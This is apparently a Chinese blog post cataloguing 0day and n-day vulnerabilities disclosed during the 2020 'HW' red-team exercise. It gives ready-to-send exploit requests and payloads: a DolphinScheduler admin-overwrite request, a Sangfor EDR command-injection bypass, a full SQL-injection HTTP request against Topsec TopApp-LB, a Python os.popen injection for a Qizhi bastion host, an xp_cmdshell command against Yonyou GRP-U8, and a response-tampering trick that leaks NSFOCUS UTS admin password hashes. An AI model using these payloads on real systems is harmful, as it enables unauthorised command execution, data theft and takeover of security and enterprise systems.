HW记录"/>
2020 HW记录
2020 HW记录-2
0x00 前言
9.11 hw开始了,记录下整个hw期间爆的0day
虽然自己有点想法 有所收获,碍于信息比较敏感的缘故,还是hw结束后再发这儿比较好。
hw可是个学习的好机会啊,冲鸭大伙儿
0x02 漏洞
一.常规漏洞
1.Apache DolphinScheduler高危漏洞
漏洞编号:CVE-2020-11974、CVE-2020-13922
1.1Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)
poc
id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=
受影响版本
- Apache DolphinScheduler = 1.2.0、1.2.1、1.3.1
不受影响版本
- Apache DolphinScheduler >= 1.3.2
1.2Apache DolphinScheduler远程执行代码漏洞(CVE-2020-11974)
受影响版本
- Apache DolphinScheduler = 1.2.0、1.2.1
不受影响版本
- Apache DolphinScheduler >= 1.3.1
参考:
@apache/msg06076.html
2.WPS 0day
.html
二.安全设备漏洞
1.你们懂的-sanX EDR(新版)
绕过:{“params”:“w=123”‘1234123’"|命令"}
结果如下:
![image.png](.png#align=left&display=inline&height=212&margin=[object Object]&name=image.png&originHeight=423&originWidth=894&size=319693&status=done&style=none&width=447)
2.天融信Top-app LB负载均衡SQL注入
天融信TopApp-LB 负载均衡系统sql注入
POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。
3.绿盟UTS管理员任意登录漏洞
此漏洞据内部人士透露 一个月前已修复并为客户升级
对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码
4.齐治堡垒机
老版本poc
post:
/shterm/listener/tui_update.php
data:
a=["t';import os;os.popen('ls')#"]
据说新版poc是java的
5.联软准入
6.用友GRP-u8 注入
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cachecVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
0x03 author:DesM0nd
其他自留地 /
更多推荐
2020 HW记录
发布评论